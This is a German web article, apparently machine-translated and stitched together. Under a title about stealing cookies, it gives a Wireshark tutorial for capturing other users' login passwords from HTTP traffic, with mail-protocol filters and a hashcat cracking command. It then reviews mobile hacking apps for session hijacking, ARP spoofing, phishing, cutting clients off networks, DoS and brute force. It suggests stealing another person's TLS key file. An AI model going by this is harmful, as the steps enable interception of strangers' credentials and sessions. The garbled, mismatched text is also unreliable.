heim - Für Anfänger
Programme zum Stehlen von Cookies per IP. Möglichkeiten, Kekse zu stehlen

Vielen Benutzern ist nicht bewusst, dass diese Daten leicht abgefangen werden können, wenn sie bei der Registrierung oder Autorisierung auf einer geschlossenen Internetressource einen Benutzernamen und ein Passwort eingeben und dann die Eingabetaste drücken. Sehr oft werden sie ungesichert über das Netzwerk übertragen. Wenn die Site, bei der Sie sich anmelden möchten, das HTTP-Protokoll verwendet, ist es daher sehr einfach, diesen Datenverkehr zu erfassen und zu analysieren mit Wireshark und dann mithilfe spezieller Filter und Programme das Passwort finden und entschlüsseln.

Der beste Ort zum Abfangen von Passwörtern ist der Kern des Netzwerks, wo der Datenverkehr aller Benutzer an geschlossene Ressourcen (z. B. E-Mail) oder vor den Router geht, um auf das Internet zuzugreifen, wenn er sich bei externen Ressourcen registriert. Wir stellen einen Spiegel auf und sind bereit, uns wie ein Hacker zu fühlen.

Schritt 1. Installieren und starten Sie Wireshark, um den Datenverkehr zu erfassen

Manchmal reicht es dazu aus, nur die Schnittstelle auszuwählen, über die wir den Datenverkehr erfassen möchten, und auf die Schaltfläche „Start“ zu klicken. In unserem Fall erfassen wir über ein drahtloses Netzwerk.

Die Verkehrserfassung hat begonnen.

Schritt 2. Filtern des erfassten POST-Verkehrs

Wir öffnen den Browser und versuchen, uns mit einem Benutzernamen und einem Passwort bei einer Ressource anzumelden. Sobald der Autorisierungsprozess abgeschlossen ist und die Website geöffnet ist, beenden wir die Erfassung des Datenverkehrs in Wireshark. Öffnen Sie als Nächstes den Protokollanalysator und sehen Sie eine große Anzahl von Paketen. Hier geben die meisten IT-Experten auf, weil sie nicht wissen, was sie als nächstes tun sollen. Aber wir kennen und interessieren uns für bestimmte Pakete, die Folgendes enthalten Post-Daten, die beim Ausfüllen eines Formulars am Bildschirm auf unserem lokalen Rechner generiert und an gesendet werden Remote-Server wenn Sie im Browser auf die Schaltfläche „Anmelden“ oder „Autorisierung“ klicken.

Wir geben im Fenster einen speziellen Filter ein, um erfasste Pakete anzuzeigen: http.Anfrage.Methode == „POST"

Und wir sehen statt tausender Pakete nur eines mit den gesuchten Daten.

Schritt 3. Finden Sie den Benutzernamen und das Passwort des Benutzers

Klicken Sie schnell mit der rechten Maustaste und wählen Sie das Element aus dem Menü aus Folgen Sie TCP Steam


Danach erscheint in einem neuen Fenster Text, der den Inhalt der Seite im Code wiederherstellt. Suchen wir die Felder „Passwort“ und „Benutzer“, die dem Passwort und dem Benutzernamen entsprechen. In einigen Fällen sind beide Felder leicht lesbar und nicht einmal verschlüsselt. Wenn wir jedoch versuchen, den Datenverkehr beim Zugriff auf sehr bekannte Ressourcen wie Mail.ru, Facebook, VKontakte usw. zu erfassen, wird das Passwort verschlüsselt:

HTTP/1.1 302 gefunden

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: Passwort= ; läuft ab=Do, 07.11.2024 23:52:21 GMT; path=/

Speicherort: login.php

Inhaltslänge: 0

Verbindung: schließen

Inhaltstyp: text/html; Zeichensatz=UTF-8

In unserem Fall also:

Benutzername: Netzwerkguru

Passwort:

Schritt 4. Bestimmen Sie den Codierungstyp zum Entschlüsseln des Passworts

Gehen Sie zum Beispiel auf die Website http://www.onlinehashcrack.com/hash-identification.php#res und geben Sie unser Passwort in das Identifikationsfenster ein. Mir wurde eine Liste der Kodierungsprotokolle in der Reihenfolge ihrer Priorität gegeben:

Schritt 5. Entschlüsseln des Benutzerpassworts

An in diesem Stadium Wir können das Hashcat-Dienstprogramm verwenden:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Als Ergebnis erhielten wir ein entschlüsseltes Passwort: simplepassword

So können wir mit Hilfe von Wireshark nicht nur Probleme beim Betrieb von Anwendungen und Diensten lösen, sondern uns auch als Hacker versuchen, indem wir Passwörter abfangen, die Benutzer in Webformulare eingeben. Sie können auch Passwörter für Benutzerpostfächer herausfinden, indem Sie einfache Filter verwenden, um Folgendes anzuzeigen:

  • Das POP-Protokoll und der Filter sehen folgendermaßen aus: pop.request.command == "USER" || pop.request.command == "PASS"
  • Das IMAP-Protokoll und der Filter lauten: imap.request enthält „login“
  • SMTP-Protokoll und Sie müssen den folgenden Filter eingeben: smtp.req.command == "AUTH"

und ernstere Dienstprogramme zum Entschlüsseln des Kodierungsprotokolls.

Schritt 6: Was passiert, wenn der Datenverkehr verschlüsselt ist und HTTPS verwendet?

Zur Beantwortung dieser Frage gibt es mehrere Möglichkeiten.

Option 1: Stellen Sie eine Verbindung her, wenn die Verbindung zwischen dem Benutzer und dem Server unterbrochen ist, und erfassen Sie den Datenverkehr in dem Moment, in dem die Verbindung hergestellt wird (SSL-Handshake). Beim Verbindungsaufbau kann der Sitzungsschlüssel abgefangen werden.

Option 2: Sie können den HTTPS-Verkehr mithilfe der von Firefox oder Chrome aufgezeichneten Sitzungsschlüssel-Protokolldatei entschlüsseln. Dazu muss der Browser so konfiguriert sein, dass er diese Verschlüsselungsschlüssel in eine Protokolldatei schreibt (FireFox-basiertes Beispiel) und Sie sollten diese Protokolldatei erhalten. Im Wesentlichen müssen Sie die Sitzungsschlüsseldatei stehlen Festplatte ein anderer Benutzer (was illegal ist). Dann erfassen Sie den Datenverkehr und verwenden Sie den resultierenden Schlüssel, um ihn zu entschlüsseln.

Klärung. Wir sprechen über den Webbrowser einer Person, deren Passwort sie zu stehlen versucht. Wenn wir die Entschlüsselung unseres eigenen HTTPS-Verkehrs meinen und üben wollen, dann wird diese Strategie funktionieren. Wenn Sie versuchen, den HTTPS-Verkehr anderer Benutzer ohne Zugriff auf deren Computer zu entschlüsseln, wird dies nicht funktionieren – das ist sowohl Verschlüsselung als auch Datenschutz.

Nachdem Sie die Schlüssel gemäß Option 1 oder 2 erhalten haben, müssen Sie diese in WireShark registrieren:

  1. Gehen Sie zum Menü Bearbeiten – Einstellungen – Protokolle – SSL.
  2. Setzen Sie das Flag „SSL-Einträge über mehrere TCP-Segmente neu zusammensetzen“.
  3. „RSA-Schlüsselliste“ und klicken Sie auf Bearbeiten.
  4. Geben Sie die Daten in alle Felder ein und schreiben Sie den Pfad mit dem Schlüssel in die Datei

„Ein Smartphone mit Hacking-Tools? So etwas gibt es nicht“, hätten wir Ihnen noch vor Kurzem gesagt. Nur auf einigen Maemo war es möglich, einige der üblichen Tools zur Durchführung von Angriffen zu starten. Mittlerweile wurden viele bekannte Tools auf iOS und Android portiert und einige Hack-Tools wurden speziell für die mobile Umgebung geschrieben. Kann ein Smartphone bei Penetrationstests einen Laptop ersetzen? Wir beschlossen, es auszuprobieren.

ANDROID

Android ist eine beliebte Plattform nicht nur für Normalsterbliche, sondern auch für die richtigen Leute. Die Anzahl der nützlichen ][-Hilfsprogramme ist einfach überwältigend. Dies verdanken wir den UNIX-Wurzeln des Systems – diese haben die Portierung vieler Tools auf Android erheblich vereinfacht. Leider lässt Google einige davon nicht in den Play Store zu, sodass Sie die entsprechende APK manuell installieren müssen. Außerdem erfordern einige Dienstprogramme maximalen Zugriff auf das System (z. B. die iptables-Firewall), sodass Sie sich im Voraus um den Root-Zugriff kümmern sollten. Jeder Hersteller verwendet hier seine eigene Technologie, aber die notwendigen Anleitungen zu finden ist recht einfach. Eine gute Reihe von HOWTOs wurde von der LifeHacker-Ressource (bit.ly/eWgDlu) zusammengestellt. Wenn Sie jedoch ein bestimmtes Modell hier nicht finden konnten, hilft Ihnen immer das XDA-Developers-Forum (www.xda-developers.com), wo Sie verschiedene Informationen zu praktisch jedem Android-Telefonmodell finden. Auf die eine oder andere Weise funktionieren einige der unten beschriebenen Dienstprogramme ohne Root-Zugriff.

Paket-Manager

BotBrew Beginnen wir die Überprüfung mit einem ungewöhnlichen Paketmanager. Die Entwickler nennen es „Dienstprogramme für Superuser“, und das ist nicht weit von der Wahrheit entfernt. Nach der Installation von BotBrew erhalten Sie ein Repository, aus dem Sie eine große Anzahl bekannter, für Android kompilierter Tools herunterladen können. Darunter: Python- und Ruby-Interpreter zum Ausführen zahlreicher darin geschriebener Tools, ein tcpdump-Sniffer und ein Nmap-Scanner für die Netzwerkanalyse, Git und Subversion für die Arbeit mit Versionskontrollsystemen und vieles mehr.

Netzwerkscanner

PIPS Für die Netzwerkerkundung kann ein unauffälliges Smartphone nützlich sein, das im Gegensatz zu einem Laptop problemlos in die Tasche passt und nie Verdacht erregt. Wir haben oben bereits gesagt, wie Sie Nmap installieren können, aber es gibt noch eine andere Möglichkeit. PIPS ist eine speziell für Android angepasste Portierung des Nmap-Scanners, wenn auch eine inoffizielle. Dies bedeutet, dass Sie schnell aktive Geräte im Netzwerk finden, deren Betriebssystem mithilfe von Fingerabdruckoptionen ermitteln, einen Port-Scan durchführen können – kurz gesagt, alles tun können, wozu Nmap in der Lage ist. Fing Trotz aller Leistungsfähigkeit gibt es bei der Verwendung von Nmap zwei Probleme. Erstens werden die Parameter zum Scannen über Starttasten übermittelt, die Sie nicht nur kennen, sondern auch umständlich eingeben müssen mobile Tastatur. Und zweitens sind die Scan-Ergebnisse in der Konsolenausgabe nicht so klar, wie wir es gerne hätten. Der Fing-Scanner weist diese Mängel nicht auf; er scannt sehr schnell das Netzwerk, führt Fingerabdrücke durch und zeigt dann in übersichtlicher Form eine Liste aller verfügbaren Geräte an, unterteilt nach Typ (Router, Desktop, iPhone usw.). Gleichzeitig können Sie für jeden Host schnell eine Liste der offenen Ports anzeigen. Darüber hinaus können Sie von hier aus beispielsweise über den im System installierten FTP-Client eine Verbindung zu FTP herstellen – sehr praktisch. NetAudit Wenn es um die Analyse eines bestimmten Hosts geht, kann das Dienstprogramm NetAudit unverzichtbar sein. Es funktioniert auf jedem Android-Gerät (auch ohne Rootberechtigung) und ermöglicht Ihnen nicht nur die schnelle Identifizierung von Geräten im Netzwerk, sondern auch deren Untersuchung mithilfe einer großen Fingerabdruckdatenbank zur Identifizierung Betriebssystem sowie auf dem Webserver eingesetzte CMS-Systeme. Mittlerweile befinden sich mehr als 3.000 digitale Fingerabdrücke in der Datenbank. Netz-Tools Wenn Sie hingegen auf einer niedrigeren Ebene arbeiten und den Betrieb des Netzwerks sorgfältig prüfen müssen, können Sie auf Net Tools nicht verzichten. Es ist bei der Arbeit unverzichtbar Systemadministrator Eine Reihe von Dienstprogrammen, mit denen Sie den Betrieb des Netzwerks, mit dem das Gerät verbunden ist, vollständig diagnostizieren können. Das Paket enthält mehr als 15 verschiedene Arten von Programmen, wie z. B. Ping, Traceroute, ARP, DNS, Netstat, Route.

Verkehrsmanipulation

Hai für Wurzel Der auf tcpdump basierende Sniffer protokolliert ehrlich alle Daten in einer PCAP-Datei, die dann mit bekannten Dienstprogrammen wie Wireshark oder Network Miner untersucht werden kann. Da darin keine Fähigkeiten für MITM-Angriffe implementiert sind, handelt es sich vielmehr um ein Tool zur Analyse Ihres Datenverkehrs. Dies ist beispielsweise eine großartige Möglichkeit, um zu untersuchen, welche Programme aus dubiosen Repositories auf Ihrem Gerät installiert sind. FaceNiff Wenn wir über Kampfanwendungen für Android sprechen, dann ist FaceNiff eine der aufsehenerregendsten Anwendungen, die das Abfangen und Einschleusen in abgefangene Websitzungen implementiert. Durch das Herunterladen des APK-Pakets mit dem Programm können Sie dieses Hack-Tool auf fast jedem Android-Smartphone ausführen und durch die Verbindung mit einem drahtlosen Netzwerk Konten verschiedener Dienste abfangen: Facebook, Twitter, VKontakte usw. – mehr als zehn in Summe. Session-Hijacking wird mit dem ARP-Spoofing-Angriff durchgeführt, der Angriff ist jedoch nur auf ungeschützten Verbindungen möglich (FaceNiff ist nicht in der Lage, sich in den SSL-Verkehr einzuschleichen). Um den Fluss von scriptdis einzudämmen, hat der Autor die maximale Anzahl von Sitzungen auf drei begrenzt – dann müssen Sie sich an den Entwickler wenden, um einen speziellen Aktivierungscode zu erhalten. DroidSheep Wenn der Ersteller von FaceNiff Geld für die Nutzung möchte, dann ist DroidSheep ein völlig kostenloses Tool mit der gleichen Funktionalität. Zwar finden Sie das Distributionskit nicht auf der offiziellen Website (das liegt an den strengen Gesetzen in Deutschland zu Sicherheitsdienstprogrammen), aber es kann problemlos im Internet gefunden werden. Die Hauptaufgabe des Dienstprogramms besteht darin, beliebte Websitzungen von Benutzern abzufangen soziale Netzwerke, implementiert mit dem gleichen ARP-Spoofing. Aber mit sichere Verbindungen Problem: Wie FaceNiff weigert sich DroidSheep rundweg, mit dem HTTPS-Protokoll zu arbeiten. Netzwerk-Spoofer Dieses Dienstprogramm demonstriert auch die Unsicherheit offener drahtloser Netzwerke, allerdings auf einer etwas anderen Ebene. Es fängt keine Benutzersitzungen ab, sondern lässt den HTTP-Verkehr mithilfe eines Spoofing-Angriffs durch sich selbst passieren und führt damit bestimmte Manipulationen durch. Angefangen bei gewöhnlichen Streichen (Ersetzen aller Bilder auf der Website durch Trollfaces, Umdrehen aller Bilder oder beispielsweise Ersetzen von Google-Ergebnissen) bis hin zu Phishing-Angriffen, bei denen dem Benutzer gefälschte Seiten so beliebter Dienste wie Facebook.com und Linkedin angezeigt werden .com, vkontakte.ru und viele andere. Anti (Android Network Toolkit von zImperium LTD)
Wenn Sie fragen, welches Hack-Dienstprogramm für Android das leistungsstärkste ist, dann hat Anti wahrscheinlich keine Konkurrenten. Das ist ein echter Hacker-Mähdrescher. Die Hauptaufgabe des Programms besteht darin, den Netzwerkperimeter zu scannen. Als nächstes treten verschiedene Module ins Spiel, mit deren Hilfe ein ganzes Arsenal umgesetzt wird: Abhören des Datenverkehrs, Ausführen von MITM-Angriffen und Ausnutzen gefundener Schwachstellen. Es stimmt, es gibt auch Nachteile. Als erstes fällt auf, dass die Ausnutzung von Schwachstellen nur vom zentralen Programmserver aus erfolgt, der sich im Internet befindet, wodurch Ziele ohne externe IP-Adresse vergessen werden können.

Verkehrstunnelbau

Totaler Kommandant Sehr bekannt Dateimanager Jetzt auf Smartphones! Wie in der Desktop-Version gibt es ein Plugin-System zur Verbindung mit verschiedenen Netzwerkverzeichnissen sowie einen kanonischen Zwei-Panel-Modus – besonders praktisch auf Tablets. SSH-Tunnel Okay, aber wie können Sie die Sicherheit Ihrer Daten gewährleisten, die über ein offenes drahtloses Netzwerk übertragen werden? Zusätzlich zu VPN, das Android standardmäßig unterstützt, können Sie einen SSH-Tunnel erstellen. Zu diesem Zweck gibt es ein wunderbares SSH-Tunnel-Dienstprogramm, mit dem Sie den Datenverkehr ausgewählter Anwendungen oder des gesamten Systems über einen Remote-SSH-Server leiten können. ProxyDroid Oft ist es notwendig, Datenverkehr über einen Proxy oder SOX zu senden, und in diesem Fall hilft ProxyDroid. Es ist ganz einfach: Sie wählen aus, welchen Anwendungsverkehr Sie tunneln möchten, und geben einen Proxy an (HTTP/HTTPS/SOCKS4/SOCKS5 werden unterstützt). Wenn eine Autorisierung erforderlich ist, unterstützt ProxyDroid dies auch. Die Konfiguration kann übrigens an eine bestimmte gebunden werden drahtloses Netzwerk, getan verschiedene Einstellungen für jeden von ihnen.

Drahtloses Netzwerk

Wifi-Analysator Der integrierte WLAN-Netzwerkmanager ist nicht sehr informativ. Wenn Sie schnell ein vollständiges Bild der nahegelegenen Zugangspunkte benötigen, ist das Dienstprogramm Wifi Analyzer eine ausgezeichnete Wahl. Es werden nicht nur alle in der Nähe befindlichen Zugangspunkte angezeigt, sondern auch der Kanal, auf dem sie arbeiten, ihre MAC-Adresse und vor allem die Art der verwendeten Verschlüsselung (nachdem wir die begehrten Buchstaben „WEP“ gesehen haben, können wir davon ausgehen, dass der Zugriff darauf erfolgt das sichere Netzwerk bereitgestellt wird). Darüber hinaus ist das Dienstprogramm dank einer visuellen Signalstärkeanzeige ideal, wenn Sie herausfinden müssen, wo sich der gewünschte Zugangspunkt physisch befindet. WiFiKill Dieses Dienstprogramm kann, wie der Entwickler angibt, nützlich sein, wenn das drahtlose Netzwerk mit Clients voll ist, die den gesamten Kanal nutzen, und Sie es genau in diesem Moment benötigen gute Verbindung und stabile Verbindung. Mit WiFiKill können Sie Clients entweder selektiv oder nach einem bestimmten Kriterium vom Internet trennen (z. B. ist es möglich, sich über alle Yabloko-Mitglieder lustig zu machen). Das Programm führt einfach einen ARP-Spoofing-Angriff durch und leitet alle Clients auf sich selbst um. Dieser Algorithmus ist dummerweise einfach auf Basis von iptables implementiert. Dies ist das Bedienfeld für drahtlose Fast-Food-Netzwerke :).

Prüfung von Webanwendungen

HTTP-Abfrage-Generator Das Bearbeiten von HTTP-Anfragen von einem Computer aus ist ein Kinderspiel; dafür gibt es eine Vielzahl von Dienstprogrammen und Browser-Plugins. Bei einem Smartphone ist alles etwas komplizierter. HTTP Query Builder hilft Ihnen beim Senden einer benutzerdefinierten HTTP-Anfrage mit den von Ihnen benötigten Parametern, beispielsweise dem gewünschten Cookie oder einem geänderten User-Agent. Das Ergebnis der Anfrage wird in einem Standardbrowser angezeigt. Router Brute Force ADS 2 Wenn die Site mit Basic Access Authentication passwortgeschützt ist, können Sie ihre Zuverlässigkeit mit dem Router Brute Force ADS 2-Dienstprogramm überprüfen. Ursprünglich wurde das Dienstprogramm entwickelt, um Passwörter im Admin-Bereich des Routers brutal zu erzwingen, aber es ist klar, dass dies möglich ist gegen jede andere Ressource mit ähnlichem Schutz eingesetzt werden. Das Dienstprogramm funktioniert, ist aber offensichtlich grob. Beispielsweise sieht der Entwickler keine Brute-Force-Methode vor, sondern nur Brute-Force-Methoden mithilfe eines Wörterbuchs. AndOSid Sicherlich haben Sie von einem so sensationellen Programm zur Deaktivierung von Webservern wie Slowloris gehört. Das Funktionsprinzip besteht darin, die maximale Anzahl von Verbindungen mit einem Remote-Webserver herzustellen und aufrechtzuerhalten und so zu verhindern, dass neue Clients eine Verbindung zu ihm herstellen. AnDOSid ist also ein Analogon von Slowloris direkt auf Ihrem Android-Gerät! Ich verrate Ihnen ein Geheimnis, zweihundert Verbindungen reichen aus instabile Arbeit Jede vierte Website betreibt einen Apache-Webserver. Und das alles – von Ihrem Telefon aus!

Verschiedene Dienstprogramme

Kodieren Bei der Arbeit mit vielen Webanwendungen und der Analyse ihrer Logik kommt es häufig vor, dass Daten in verschlüsselter Form, nämlich Base64, übertragen werden. Encode hilft Ihnen, diese Daten zu entschlüsseln und zu sehen, was genau darin gespeichert ist. Vielleicht erhalten Sie den begehrten Datenbankabfragefehler, indem Sie Anführungszeichen ersetzen, sie wieder in Base64 kodieren und sie in der URL der Website ersetzen, die Sie recherchieren. HexEditor Bei Bedarf Hex-Editor, dann ist es auch für Android verfügbar. Mit HexEditor können Sie beliebige Dateien, einschließlich Systemdateien, bearbeiten, wenn Sie die Rechte des Programms auf Superuser erhöhen. Ein hervorragender Ersatz für einen Standard-Texteditor, mit dem Sie den gewünschten Textabschnitt leicht finden und ändern können.

Fernzugriff

ConnectBot hat zugegriffen zum Remote-Host, Sie müssen es nutzen können. Und dafür brauchen wir Kunden. Beginnen wir mit SSH, wo ConnectBot bereits der De-facto-Standard ist. Außerdem Benutzerfreundliches Bedienfeld bietet die Möglichkeit, sichere Tunnel über SSH-Verbindungen zu organisieren. PocketCloud Remote RDP/VNC Ein nützliches Programm, mit dem Sie über RDP- oder VNC-Dienste eine Verbindung zu einem Remote-Desktop herstellen können. Ich bin sehr froh, dass dies zwei Clients in einem sind; es ist nicht notwendig, unterschiedliche Tools für RDP und VNC zu verwenden. SNMP-MIB-Browser Speziell geschrieben für Android-Browser MIB, mit dem Sie Netzwerkgeräte verwalten können SNMP-Protokoll. Dies kann für die Entwicklung eines Angriffsvektors auf verschiedene Router nützlich sein, da der Standard-Community-String (also ein Zugangspasswort) für die Verwaltung über SNMP noch nicht abgeschafft wurde.

iOS

Die iOS-Plattform ist bei Entwicklern von Sicherheitsdienstprogrammen nicht weniger beliebt. Aber wenn im Fall von Android-Rechte Während Root nur für einige Anwendungen erforderlich war, ist ein Jailbreak auf Apple-Geräten fast immer erforderlich. Glücklicherweise gibt es selbst für die neueste iDevices-Firmware (5.1.1) bereits ein Jailbreak-Tool. Neben dem Vollzugriff erhalten Sie auch einen alternativen Anwendungsmanager, Cydia, der bereits viele Dienstprogramme enthält.

Arbeiten mit dem System

MobileTerminal Als Erstes möchte ich mit der Installation des Terminals beginnen. Aus offensichtlichen Gründen ist es nicht im Standardlieferumfang des mobilen Betriebssystems enthalten, wir benötigen es jedoch zum Ausführen von Konsolendienstprogrammen, auf die wir weiter unten eingehen werden. Die beste Implementierung eines Terminalemulators ist MobileTerminal – es unterstützt mehrere Terminals, Steuergesten (z. B. zum Senden von Control-C) und beeindruckt im Allgemeinen durch seine Nachdenklichkeit. iSSH Noch einer, noch einer schwierige Option Zugriff auf die Gerätekonsole erhalten – OpenSSH darauf installieren (dies erfolgt über Cydia) und lokal über einen SSH-Client eine Verbindung herstellen. Wenn Sie den richtigen Client wie iSSH verwenden, der über eine hervorragende Touchscreen-Steuerung verfügt, ist diese Methode sogar noch bequemer als die Verwendung von MobileTerminal.

Datenabfang

Pirni & Pirni Pro Da Sie nun Zugriff auf die Konsole haben, können Sie die Dienstprogramme ausprobieren. Beginnen wir mit Pirni, das als vollwertiger Sniffer für iOS in die Geschichte einging. Leider lässt sich das im Gerät verbaute, baulich begrenzte WLAN-Modul nicht in den Promiscuous-Modus schalten, der für das normale Abfangen von Daten notwendig ist. Um Daten abzufangen, kommt also klassisches ARP-Spoofing zum Einsatz, mit dessen Hilfe der gesamte Datenverkehr über das Gerät selbst geleitet wird. Die Standardversion des Dienstprogramms wird über die Konsole gestartet, wo zusätzlich zu den MITM-Angriffsparametern der Name der PCAP-Datei angegeben wird, in der der gesamte Datenverkehr protokolliert wird. Das Dienstprogramm verfügt über eine erweiterte Version – Pirni Pro, die über eine grafische Benutzeroberfläche verfügt. Darüber hinaus kann es den HTTP-Verkehr im Handumdrehen analysieren und sogar automatisch interessante Daten von dort abrufen (z. B. Logins und Passwörter). Reguläre Ausdrücke, die in den Einstellungen festgelegt werden. Intercepter-NG (Konsolenausgabe) Der bekannte Sniffer Intercepter-NG, über den wir schon mehrfach geschrieben haben, hat seit kurzem eine Konsolenversion. Wie der Autor sagt, ist der größte Teil des Codes in reinem ANSI C geschrieben, das sich in fast jeder Umgebung gleich verhält, sodass die Konsolenversion von Anfang an sowohl auf Desktop-Windows, Linux und BSD als auch darüber hinaus funktionierte mobile Plattformen, einschließlich iOS und Android. Die Konsolenversion implementiert bereits das Erfassen von Passwörtern, die über eine Vielzahl von Protokollen übertragen werden, das Abfangen von Instant-Messenger-Nachrichten (ICQ/Jabber und viele andere) sowie die Wiederherstellung von Dateien aus dem Datenverkehr (HTTP/FTP/IMAP/POP3/SMTP/SMB). Gleichzeitig stehen Netzwerk-Scanfunktionen und hochwertiges ARP Poison zur Verfügung. Für einen korrekten Betrieb müssen Sie zunächst das libpcap-Paket über Cydia installieren (vergessen Sie nicht, Entwicklungspakete in den Einstellungen zu aktivieren). Alle Startanweisungen laufen darauf hinaus, die richtigen Rechte festzulegen: chmod +x intercepter_ios. Wenn Sie als Nächstes den Sniffer ohne Parameter ausführen, erscheint eine übersichtliche interaktive Itercepter-Oberfläche, über die Sie beliebige Angriffe starten können. Ettercap-NG Es ist kaum zu glauben, aber dieses hochentwickelte Tool zur Umsetzung von MITM-Angriffen wurde endlich auf iOS portiert. Nach enormer Arbeit ist es uns gelungen, einen vollwertigen mobilen Port zu erstellen. Um zu vermeiden, dass Sie während der Selbstkompilierung mit einem Tamburin um Abhängigkeiten herumtanzen, ist es besser, ein bereits erstelltes Paket mit Cydia zu installieren, nachdem Sie theworm.altervista.org/cydia (TWRepo-Repository) als Datenquelle hinzugefügt haben. IN inbegriffen und das Dienstprogramm etterlog, das dabei hilft, verschiedene Arten nützlicher Informationen aus dem gesammelten Verkehrsspeicherauszug zu extrahieren (z. B. FTP-Zugriffskonten).

Analyse drahtloser Netzwerke

WiFi-Analysator Im alten iOS-Versionen Handwerker haben Aircrack ausgeführt und konnten den WEP-Schlüssel knacken, aber wir haben überprüft: Das Programm funktioniert nicht auf neuen Geräten. Um Wi-Fi zu studieren, müssen wir uns daher nur mit Wi-Fi-Scannern begnügen. WiFi-Analysator Analysiert und zeigt Informationen zu allen verfügbaren 802.11-Netzwerken an, einschließlich Informationen zu SSID, Kanälen, Anbietern, MAC-Adressen und Verschlüsselungstypen. Das Dienstprogramm erstellt in Echtzeit visuelle Diagramme auf der Grundlage der in der Luft vorhandenen Daten. Mit einem solchen Programm ist es einfach, den physischen Standort des Punkts zu finden, wenn Sie ihn plötzlich vergessen, und beispielsweise einen Blick auf die WPS-PIN zu werfen, die für die Verbindung nützlich sein kann.

Netzwerkscanner

Scany Welches Programm verwendet ein Pentester irgendwo auf der Welt, unabhängig von seinen Zielen und Vorgaben? Netzwerkscanner. Und im Fall von iOS wird dies höchstwahrscheinlich das leistungsstärkste Scany-Toolkit sein. Dank einer Reihe integrierter Dienstprogramme können Sie sich schnell ein detailliertes Bild davon machen Netzwerkgeräte ach ja, und zum Beispiel offene Ports. Darüber hinaus enthält das Paket Netzwerktest-Dienstprogramme wie Ping, Traceroute und NSLookup. Fing Allerdings bevorzugen viele Menschen Fing. Der Scanner verfügt über eine recht einfache und eingeschränkte Funktionalität, reicht aber für die erste Bekanntschaft mit dem Netzwerk beispielsweise einer Cafeteria völlig aus :). Die Ergebnisse zeigen Informationen über verfügbare Dienste auf Remote-Rechnern, MAC-Adressen und Hostnamen an, die mit dem gescannten Netzwerk verbunden sind. Nikto Es scheint, dass jeder Nikto vergessen hat, aber warum? Schließlich können Sie diesen in einer Skriptsprache (nämlich Perl) geschriebenen Web-Schwachstellenscanner ganz einfach über Cydia installieren. Das bedeutet, dass Sie es ganz einfach vom Terminal aus auf Ihrem Gerät mit Jailbreak starten können. Nikto stellt Ihnen gerne zur Verfügung Weitere Informationen auf der getesteten Webressource. Darüber hinaus können Sie der Wissensdatenbank mit eigenen Händen eigene Suchsignaturen hinzufügen. sqlmap Dies leistungsfähiges Werkzeug Zur automatischen Ausnutzung von SQL-Schwachstellen ist es in Python geschrieben, sodass Sie ihn nach der Installation des Interpreters problemlos direkt von Ihrem Mobilgerät aus verwenden können.

Fernbedienung

SNMP-Scan Viele Netzwerkgeräte (einschließlich teurer Router) werden über das SNMP-Protokoll verwaltet. Mit diesem Dienstprogramm können Sie Subnetze nach verfügbaren SNMP-Diensten mit vorbekannten Community-String-Werten (also Standardkennwörtern) durchsuchen. Beachten Sie, dass die Suche nach SNMP-Diensten mit Standard-Community-Strings (öffentlich/privat) bei dem Versuch, Zugriff auf die Geräteverwaltung zu erhalten, neben der Identifizierung des Perimeters selbst und der Identifizierung von Diensten ein wesentlicher Bestandteil jedes Penetrationstests ist. iTap mobile RDP / iTap mobile VNC Zwei Dienstprogramme desselben Herstellers sind für die Verbindung mit einem Remote-Desktop über die Protokolle RDP und VNC konzipiert. Ähnliche Dienstprogramme in Appstore Es gibt viele davon, aber diese sind besonders praktisch in der Anwendung.

Passwort-Wiederherstellung

Hydra Das legendäre Programm, das Millionen von Hackern auf der ganzen Welt hilft, sich ihr Passwort zu „merken“, wurde auf iOS portiert. Jetzt können Sie direkt von Ihrem iPhone aus nach Passwörtern für Dienste wie HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 und viele andere suchen. Für einen effektiveren Angriff ist es zwar besser, sich mit guten Brute-Force-Wörterbüchern einzudecken. Pass Mule Jeder kennt die Verwundbarkeit des Konsums aus erster Hand Standard-Passwörter. Pass Mule ist eine Art Verzeichnis, das alle Arten von Standard-Logins und Passwörtern für Netzwerkgeräte enthält. Sie sind übersichtlich nach Anbietername, Produkt und Modell geordnet, sodass es nicht schwierig sein wird, das von Ihnen benötigte Produkt zu finden. Das Programm soll vielmehr Zeit bei der Suche nach einem Handbuch für den Router sparen, dessen Standard-Login und Passwort Sie herausfinden müssen.

Ausnutzen von Schwachstellen

Metasploit
Man kann sich kaum ein Hacker-Dienstprogramm als Metasploit vorstellen, und damit schließen wir unseren heutigen Testbericht ab. Metasploit ist ein Paket verschiedener Tools, deren Hauptaufgabe darin besteht, Schwachstellen auszunutzen Software. Stellen Sie sich vor: etwa 1000 zuverlässige, bewährte und notwendige Exploits im täglichen Leben eines Pentesters – direkt auf Ihrem Smartphone! Mit Hilfe eines solchen Tools können Sie sich wirklich in jedem Netzwerk etablieren. Mit Metasploit können Sie nicht nur Schwachstellen in Serveranwendungen ausnutzen – es stehen auch Tools zum Angriff auf Clientanwendungen zur Verfügung (z. B. über das Browser-Autopwn-Modul, wenn eine Kampfnutzlast in den Clientverkehr eingefügt wird). Hier muss man das sagen mobile Version Es gibt kein Toolkit, aber Sie können mit . ein Standardpaket auf einem Apple-Gerät installieren.

Was ist ein Cookie?

Es gibt einen Mechanismus, der es dem HTTP-Server ermöglicht, einige Textinformationen auf dem Computer des Benutzers zu speichern und dann darauf zuzugreifen. Diese Information wird als Cookie bezeichnet. Im Wesentlichen ist jedes Cookie ein Paar: der Name eines Parameters und sein Wert. Jedem Cookie wird außerdem die Domain zugeordnet, zu der es gehört. Aus Sicherheitsgründen darf der http-Server in allen Browsern nur auf das Cookie seiner Domain zugreifen. Darüber hinaus können Cookies ein Ablaufdatum haben. In diesem Fall bleiben sie bis zu diesem Datum auf dem Computer gespeichert, auch wenn Sie alle Browserfenster schließen.


Warum sind Cookies wichtig?

Alle Mehrbenutzersysteme verwenden Cookies zur Identifizierung des Benutzers. Genauer gesagt, die aktuelle Verbindung des Benutzers zum Dienst, Benutzersitzung. Wenn jemand Ihre Cookies erkennt, kann er sich in Ihrem Namen beim System anmelden. Weil in momentan Nur sehr wenige Internetressourcen prüfen während einer Benutzersitzung, ob sich die IP-Adresse geändert hat.


